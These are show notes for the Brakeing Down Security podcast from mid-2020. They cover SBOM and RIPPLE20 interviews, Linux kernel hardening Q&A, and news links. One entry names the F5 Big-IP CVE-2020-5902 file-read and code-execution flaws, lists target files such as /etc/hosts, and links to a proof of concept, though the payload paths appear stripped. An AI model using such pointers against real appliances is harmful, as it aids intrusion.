#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 29, 20202020-034-Fortnite account selling, process change agility, IRS wanting to track the 'untrackable'
https://www.kitploit.com/2020/05/web-hackers-weapons-collection-of-cool.html
https://www.ehackingnews.com/2020/09/hackers-attack-gaming-industry-sell.html
https://www.secjuice.com/windows-10-penetration-testing-os/
Nice to see stories about using Win10 as a pentest platform.
Was always a PITA to update Kali or whatever. @secjuice
One reason I enjoyed Dave Kennedy’s ‘pentester framework’ --brbr
https://www.ehackingnews.com/2020/09/a-new-security-vulnerability-discovered.html
https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support
https://kbondale.wordpress.com/2020/09/13/lets-flatten-five-agile-fallacies/
Speak more to the need for process improvement. Trying to embrace a new ‘agile’ methodology is bunk. Find inefficiencies, work to improve those, collect metrics to show improvements.
https://www.linkedin.com/pulse/intersection-change-management-project-paula-alsher/
Lead to an excellent segue to our book club.
By the book, https://brakesec.com/adkar - used books on Amazon going for less than $10 USD
Thursday 17, 2020 - 7pm Pacific
FEEDBACK: "Gotta say I’m really enjoying this book. It has my mind moving in so many directions - our team’s change initiatives and desires, the agency-level initiatives, other change leaders in our org and their tools/techniques and successes/failures."
https://securityscorecard.com/blog/the-cisos-guide-to-reporting-cybersecurity-to-the-board
This came up during a discussion on our Slack.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonSmile: https://brakesec.com/smile
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 14, 20202020-033-garmin hack, Tesla employee thwarted IP espionage, Slack RCE payout, and more!
WWFH Class: (Ms. Berlin)
“Breaching the Cloud”
@dafthack
https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/
https://wildwesthackinfest.com/wwhf-at-secure-wv/
IWCE 2020 panel:
“Being a thought leader”
ADKAR class
Book Club: 03 September 2020 7pm: https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504/ref=sr_1_1?dchild=1&keywords=ADKAR&qid=1598543747&sr=8-1
TLS cert life is 13 months now (397 day) than now:
https://www.bleepingcomputer.com/news/technology/you-have-two-days-left-to-purchase-2-year-tls-ssl-certificates/
Tesla and FBI prevented $1 million ransomware hack at Gigafactory Nevada
https://electrek.co/2020/08/27/tesla-fbi-prevent-ransomware-hack-gigafactory-nevada/
https://hackerone.com/reports/783877
https://www.reddit.com/r/netsec/comments/iifh3r/remote_code_execution_in_slack_desktop_apps/
Reserved Campsites for InfosecCampout 2021
MHH Feel Good Boxes
Trojan - “not my fault”
Segfaults and then injects DLLs
@seaseceast
Published on: August 31, 20202020-032-Dr. Allan Friedman, SBOM, Software Transparency, and how the sausage is made - Part 2
Ms. Berlin: Tabletop D&D exercise
Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
NTIA.gov - National Telecommunications and Information Administration
https://www.ntia.gov/sbom SBOM guidance
Healthcare SBOM PoC - https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf
Allan’s talk at Bsides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ
Questions (more may be added during the show, depending on answers given)
What is NTIA?
What is SBOM?
Why do we need one? Is it poor communications between vendors?
Is there any difference between “Software transparency” and “Software bill of materials”?
How do you make an SBOM? What data formats make sharing easier? What does a company do with an SBOM?
Where in the development (hardware or software) would you be creating an SBOM?
You mention in your BSSF talk about ‘how detailed it should be’. Can you give us an example of a high level SBOM, versus a more detailed one? Does it become a risk/reward effort concerning detail?
IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them?
How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ?
As we saw with RIPPLE20, many companies don’t know what they have. How would SBOM help keep another RIPPLE20 from happening?
Rob Graham’s blog post highlighted that vulns like HeartBleed would not have been stopped.
How does this help us track potential vulns?
Sharing information
Best way to share information about IoT components?
Could an information sharing org (ISAC) track these more readily?
vendor assessments:
Vendor does not have an SBOM, any specific questions we might ask that will allow an org to get more resolution into a potential vendor?
Interesting feedback from NTIA’s RFC
Other SBOM types (clonedx, openbom, FDA’s CBOM)
Companies are out there creating SBOM, other government agencies have SBOM implementations. How do we keep this from being the XKCD “927” issue? https://xkcd.com/927/
non-US implementations of SBOM?
How do we get our companies to implement these?
SBOM could easily be something that could give hackers a lot of information about your org and depending on the information contained, I could see why you might not want to get super specific… Thoughts?
What is a ‘Bill of Materials’?
“A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product.”
SBOM - Definition
As of November 2019, an estimated 126 different platforms - https://www.postscapes.com/internet-of-things-platforms/
NTIA did an RFC on “promoting the sharing of Supply Chain Security Risk Information”
Secure and Trusted Communications Network Act of 2019 (Act) - Calling it “CBOM”
Other groups working on similar: FDA https://www.fda.gov/media/119933/download
SPDX: LInux Foundation:https://spdx.org/licenses/
https://github.com/CycloneDX/specification
https://www.fda.gov/medical-devices/digital-health/cybersecurity
Medical device IR Playbook: https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf
Companies are helping to get “CBOM” for devices:
““It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA,” said MedCrypt CEO Mike Kijewski in a news release”
https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/
SBOM doesn’t work in DevOps: https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops
Intoto software development: https://www.intotosystems.com/
510k process: https://www.drugwatch.com/fda/510k-clearance/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonSmile: https://brakesec.com/smile
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 24, 20202020-031-Allan Friedman, SBOM, software transparency, and knowing how the sausage is made
Ms. Berlin: Tabletop D&D exercise
Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/
Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce
NTIA.gov - National Telecommunications and Information Administration
https://www.ntia.gov/sbom SBOM guidance
Healthcare SBOM PoC - https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf
Allan’s talk at Bsides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ
Questions (more may be added during the show, depending on answers given)
What is NTIA?
What is SBOM?
Why do we need one? Is it poor communications between vendors?
Is there any difference between “Software transparency” and “Software bill of materials”?
How do you make an SBOM? What data formats make sharing easier? What does a company do with an SBOM?
Where in the development (hardware or software) would you be creating an SBOM?
You mention in your BSSF talk about ‘how detailed it should be’. Can you give us an example of a high level SBOM, versus a more detailed one? Does it become a risk/reward effort concerning detail?
IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them?
How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ?
As we saw with RIPPLE20, many companies don’t know what they have. How would SBOM help keep another RIPPLE20 from happening?
Rob Graham’s blog post highlighted that vulns like HeartBleed would not have been stopped.
How does this help us track potential vulns?
Sharing information
Best way to share information about IoT components?
Could an information sharing org (ISAC) track these more readily?
vendor assessments:
Vendor does not have an SBOM, any specific questions we might ask that will allow an org to get more resolution into a potential vendor?
Interesting feedback from NTIA’s RFC
Other SBOM types (clonedx, openbom, FDA’s CBOM)
Companies are out there creating SBOM, other government agencies have SBOM implementations. How do we keep this from being the XKCD “927” issue? https://xkcd.com/927/
non-US implementations of SBOM?
How do we get our companies to implement these?
SBOM could easily be something that could give hackers a lot of information about your org and depending on the information contained, I could see why you might not want to get super specific… Thoughts?
What is a ‘Bill of Materials’?
“A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product.”
SBOM - Definition
As of November 2019, an estimated 126 different platforms - https://www.postscapes.com/internet-of-things-platforms/
NTIA did an RFC on “promoting the sharing of Supply Chain Security Risk Information”
Secure and Trusted Communications Network Act of 2019 (Act) - Calling it “CBOM”
Other groups working on similar: FDA https://www.fda.gov/media/119933/download
SPDX: LInux Foundation:https://spdx.org/licenses/
https://github.com/CycloneDX/specification
https://www.fda.gov/medical-devices/digital-health/cybersecurity
Medical device IR Playbook: https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf
Companies are helping to get “CBOM” for devices:
““It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA,” said MedCrypt CEO Mike Kijewski in a news release”
https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/
SBOM doesn’t work in DevOps: https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops
Intoto software development: https://www.intotosystems.com/
510k process: https://www.drugwatch.com/fda/510k-clearance/
Published on: August 18, 20202020-030- Mick Douglas, Defenses against powercat, offsec tool release, SRUM logs, and more!
WISP.org donation page: https://wisporg.z2systems.com/np/clients/wisporg/donation.jsp
Mick Douglas (@bettersafetynet on Twitter)
Powercat: https://github.com/besimorhino/powercat
Netcat in a powershell environment
https://www.hackingarticles.in/powercat-a-powershell-netcat/
Defenses against powercat?
LolBins: https://www.cynet.com/blog/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/
ElasticSearch bought Endgame; https://www.elastic.co/about/press/elastic-announces-intent-to-acquire-endgame
https://krebsonsecurity.com/2020/07/thinking-of-a-cybersecurity-career-read-this/
Twitter DM to @bettersafetynet:
Hey... I wanna talk about @hrbrmstr's tweet on the show tonight as well...
https://twitter.com/hrbrmstr/status/1287442304593276929
My thinking is if Cisco and others didn't try to intentionally downplay vulnerabilities by announcing them on a Friday, would we be more likely to patch sooner? Also, greater need for testing of patches to ensure that 80% of your workforce rely on that technology now. What's worse? Patching on a Friday evening (after several hours explaining the vuln to a manager), and then having it fuck something up so you're up at crack of dawn Monday troubleshooting something missed Friday night because testing was rushed/not conducted because the CEO can't access email?
I have thoughts, I've added this to the show note google doc.
https://www.reddit.com/r/netsec/comments/hwaj6f/nmap_script_fot_cve20203452/ -- nmap PoC script?
Embargoed vulns…
Getting management buy-in to patch
Published on: August 10, 20202020-029- Brad Spengler, Linux kernel security in the past 10 years, software dev practices in Linux, WISP.org PSA
WISP.org PSA at 35m56s - 37m 19s
Agenda:
Bio/background
Why are you here (topic discussion)
What is the Linux Security Summit North America
Questions from the meeting invite:
This only affects people who want to use a custom kernel, correct? This doesn’t affect you if you are running bog-standard linux (debian, gentoo, Ubuntu) right?
What options do people have in cloud environments?
Does the use of microservices make grsecurity less worthwhile?
You mentioned ARM 64 processors in your first slide as making significant security functionality strides. With Apple and Microsoft going to ARM based processors, what are some things you feel need to be added to the kernel to shore up Linux for ARM, since some purists enjoy an Apple device with Linux on it?
https://www.youtube.com/watch?v=F_Kza6fdkSU - Youtube Video
https://grsecurity.net/10_years_of_linux_security.pdf -- pdf slides
https://lwn.net/Articles/569635/ - Definition of KASLR
LTS kernels moved from 2 years to 6 years - why?
6 years is pretty much “FOREVER” in software development.
Patches get harder to backport, or worse;
Could introduce new vulnerabilities
Project Treble: https://www.computerworld.com/article/3306443/what-is-project-treble-android-upgrade-fix-explained.html
LTSI: https://ltsi.linuxfoundation.org/
4.4 XLTS is available until Feb2022 -
If fixes and all bugs haven’t been backported (1,250 security fixes aren’t in the latest stable 4.4 kernel)
What are the “safe” kernels?
Has anything changed since the presentation you gave earlier in July 2020
Syzkaller
Let’s discuss Slide 27 (what are those tems?)
“Is it improving code quality, or Is it making people lazier and more reliant on a tool to check code?”
Slide 29 audio, you mention that you use Syzkaller… why do you use it?
Exploitation Trends
Attackers still don’t care about whether a vulnerability has a CVE assigned or not
Don’t many vulnerabilities require some work to get to the kernel? And why should they work to get to the kernel?
500K IF the kernel vuln affects major distros (Centos, Ubuntu)
https://resources.whitesourcesoftware.com/blog-whitesource/top-10-linux-kernel-vulnerabilities
Why does Zerodium payout for kernel vulns lower than application vulns? Would it be fair to say that getting root/persistence is all that matters and you don’t need to worry about the kernel to do so?
Many of the new security features are protecting against bad programming practices?
So by adding all these things, who are you securing systems against? Bad actors, or devs who employ poor coding measures?
Why do you think we see lower adoption rates of security
Problem solving:
Halvar Flake: http://addxorrol.blogspot.com/2020/03/before-you-ship-security-mitigation.html
If we have time…
Threat models in a kernel
Where do they go in the development lifecycle?
If kernel dev is an open environment, what precipitates the need for a kernel mitigation threat model
Is there an example somewhere that we can see? What is the format? Methodology?
Do you think static code analysis of the kernel is worthwhile at all?
Absolutely! We do a lot of it, including via the analysis resulting from compiling with LLVM, as well as via specific static analysis GCC plugins of our own.
OK, what about the large amount of false positives the analyzers generate? Do you get around with your custom plugins? Also do you use the analyzers included with Clang and GCC v.10 or 3rd products?
That's usually a property of the analysis itself -- some can have large false positive issues, others not. Ideally we try to limit that for the plugins we write (we just recently added one helpful for some kind of NULL ptr dereferences this week). My understanding is the public now also has access to the Coverity reports for the kernel? As far as GCC versions, yes we test with all versions from 4.5 to 10.
What do you think of proposed XPFO patch? https://lwn.net/Articles/784839/
The performance profile is a big problem, and it doesn't address that the same attack can be performed in a different way that it wouldn't handle (that limitation is also mentioned in the original paper). So we haven't invested in it at all with our own work.
how about git sha-256 security measures ?
Not my domain of expertise, but sounds like a good idea.
What is the status of KASLR on non-Intel architectures? ARMv7/v8?
It exists there as well, and is shipped in Android. It's also recently been added for PowerPC.
What dynamic analysis/testing tools do you use for the kernel?
We have a couple racks of hardware, including some new AMD EPYC2 systems dedicated entirely to testing and syzkaller fuzzing. We have syzkaller in place (along with backports of functionality to improve its functionality/coverage) for all kernels we support, as well as a good mix of physical/VM systems for major distros, and automated build/boot/functionality/regression testing in a number of configs across ARM/ARM64/MIPS/PowerPC/SPARC64/i386/x86_64.
Thanks! Do you write your own configs/definitions for syzkaller?
Yes, including some changes to the code to have it detect some of our specific kernel message (size_overflow, refcount, RAP, etc)
What do you think about LKRG? Also, does grsec provide any similar runtime protection/detection/security?
I think it's a good alternative to some other commercial security products, but it's not what our goal is with grsecurity. I like the author of LKRG, but heuristic-based security is always problematic as you can't perform the checks everywhere they need to be performed, or as often as they need to be performed. When an attacker knows the checks performed (or has a general idea), then it's easy to devise an attack that would bypass it, knowing how computationally complex it would be to detect. So in grsecurity we focus on providing real defense vs just having a chance to detect something after the fact.
Do you plan on implementing RAP on PowerPC Architecture?
We haven't seen any commercial interest in it, but RAP is technically architecture-independent. We've done some demos for non-x86 architectures, and also just recently (within the past month or so), released a version for i386.
For how long GRSecurity is planning to support 5.4 LTS and LTS generally? What do you think is a good rule of thumb?
We've always generally supported them for 3 years, regardless of upstream's support periods. We have an independent process for performing backports that involves looking at all the upstream commits and other sources of information, regardless of any stable/Fixes tags (basically a manual version of AUTOSEL).
What is your opinion of the recently proposed Function-Granular KASLR series?
Not a fan of *KASLR in the kernel in general. It tries to deal with a problem (poorly) that there already exists a much better solution for: CFI.
Could you comment on how well (relative to your x86 detailed knownledge) ARM and PPC security fixes are backported?
We have many years of reverse engineering experience (15+ on my end) across multiple architectures. We were the first to develop software-based PXN/PAN for ARM for instance. We've also developed functionality specifically for non-x86 architectures. Within the past 2 years or so, we added POWER9 support for REFCOUNT, and have the physical hardware on site (in additional to qemu-based testing) to perform the work. But yes, our backports cover all architectures we support.
What is your opinion on the use of BPF for security-purposes, i.e. security monitoring and newer approaches like KRSI? Enabling something like BPF solely for the use of security seems like it could backfire, given how invasive it is.
As long as it's not controllable by an unprivileged user, I think it's fine. Anything that avoids the hassle of having to upstream something in order to implement some new kind of security check, is a good idea. They'll still be limited by the LSM interface itself, so that would be the next barrier to go. With BTF, there's a lot of possibility there.
Regarding exploiting containers: isn't the issue with containers that they have very poor defaults and that people don't use the features they could? For example: mounting sysfs or procfs into a container or not adjusting seccomp/apparmor (or better(?) selinux) policies?
That's a problem, but the crucial problem is the shared kernel among all containers. If you look at past exploits, they've been in things like futex, mremap, waitid, brk, etc, all syscalls that would be allowed in nearly all of the most strict seccomp policies. The granularity of current seccomp policies is really not that great, and any sufficiently complex code will necessarily have exposure to a large part of kernel attack surface.
What do you think about the CIP Projects' focus on CVE tracking (especially for the kernel)?
It's a good initiative, but the main problem with the kernel is that most vulnerabilities in the kernel don't get a CVE in the first place. I know for certain that many of the security issues we've tweeted haven't had a CVE assigned. The ones that do are when a distro with the vuln present in their kernel spots it and requests one. Most vulnerabilities in recent kernels especially don't get CVEs requested, because distros aren't shipping them.
What's your opinion on SMACK? Any other reference implementation except Tizen?
Haven't used it myself, so no opinion one way or another, sorry Doesn't seem bad at least in terms of number of security fixes backported to it compared to other access control LSMs.
If you disable as many CONFIG_* options in your kernel config have you actually reduced your attack surface or is most of the vulnerable code not in modules?
Yes, this is a good approach particularly for upstream kernels. I would definitely recommend compiling your own kernel instead of using default distro configs (from a security perspective).
Under grsecurity, we have a feature that makes it actually a good idea to put as much functionality in modules as possible, as they can't be auto-loaded by unprivileged users. So the functionality is there if it's needed across a fleet of systems, without the downsides.
TARA analysis performed in Linux Kernel ?
I'm not familiar with this, sorry!
Is the poor state of LTS and XLTS security backports found in PPC and ARM as well as (presumably) what you report for x86?
It's somewhat of an across-the-board problem
Actually I hoped that you will tell about new cool features that appeared in grsecury. Can you share anything about your new kernel heap hardening?
It's called AUTOSLAB, and it's useful both for security (particularly against AEG and UAFs), but also for debugging. Minimal performance impact, we've had one person mention their system feels faster now, and we actually had a bug in one of our routine benchmarks where the feature got enabled in the "minimal" config, yet still reported better benchmark results in all tests than an upstream kernel. So a really nice performance profile, with some additional memory wastage in the MEMCG case, but nothing terrible. Also non-invasive, as it's done through a GCC plugin.
Thanks for your talk, Brad! What would make you work for upstream?
We offered that already years ago, and none of the companies involved seemed to be interested. So we're funded directly now by people that benefit from our work.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonSmile: https://brakesec.com/smile
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 31, 20202020-028-Shlomi Oberman, RIPPLE20, supply chain security discussion, software bill of materials
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing
Agenda:
Part 1:
Background on the report
Why is it called RIPPLE20? What’s the RIPPLE about?
Communications with Treck (and it’s Japanese counterpart)
Were you surprised about the reaction? Positive or negative?
Types of systems affected?
IoT
Embedded systems
SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack?
Speed? Size?
Do these vulns affect other TCP/IP stacks?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2:
Supply chain issues
What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible
“Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected].”
BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver
Vendor Contact
How many organizations are affected by these vulnerabilities?
Are some devices and systems more vulnerable than others?
How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”?
Who are you dealing with initially? What is your delivery when you’re routed to non-technical people?
How did you tailor your initial response when you learned of the position of the person?
Lessons Learned:
What would you have done differently next time?
Any additional tooling that you’d have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 24, 20202020-027-RIPPLE20 Report, supply chain security, responsible disclosure, software development, and vendor care.
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing
Agenda:
Part 1:
Background on the report
Why is it called RIPPLE20? What’s the RIPPLE about?
Communications with Treck (and it’s Japanese counterpart)
Were you surprised about the reaction? Positive or negative?
Types of systems affected?
IoT
Embedded systems
SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack?
Speed? Size?
Do these vulns affect other TCP/IP stacks?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2:
Supply chain issues
What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible
“Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected].”
BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver
Vendor Contact
How many organizations are affected by these vulnerabilities?
Are some devices and systems more vulnerable than others?
How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”?
Who are you dealing with initially? What is your delivery when you’re routed to non-technical people?
How did you tailor your initial response when you learned of the position of the person?
Lessons Learned:
What would you have done differently next time?
Any additional tooling that you’d have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 16, 2020
2020-026- WISP PSA, PAN-OS vuln redux, F5 has a bad weekend, vuln scoring, Twitter advice, and more!
1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber
#SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537
F5 vulnerability:
https://www.wired.com/story/f5-big-ip-networking-vulnerability/
F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258
Redirect 404 /
https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE
F5 Big-IP CVE-2020-5902 LFI and RCE
LFI
https://
or /etc/hosts
or /config/bigip.license
RCE
https://
How to cope in a no-win situation:
https://twitter.com/datSecuritychic/status/1280527467569008640
Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.
Published on: July 8, 20202020-025-Cognizant breach, maze ransomware, PAN-OS CVE 2020-2021, SAML authentication walkthrough
Thank you to Marcus Carey for his excellent guidance and leadership this week.
Cognizant breach: https://www.ehackingnews.com/2020/06/cognizant-reveals-employees-data.html
Maze ransomware write-up: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
https://docs.paloaltonetworks.com/pan-os/9-0/pan-os-admin/authentication/authentication-types/saml
PAN-OS CVE 2020-2021 -
We have been made aware of a serious issue with SAML on Palo Alto Networks PAN-OS
We strongly encourage our customers to upgrade to one of the following versions :
PAN-OS 8.1.15
PAN-OS 9.0.9
PAN-OS 9.1.3 and greater
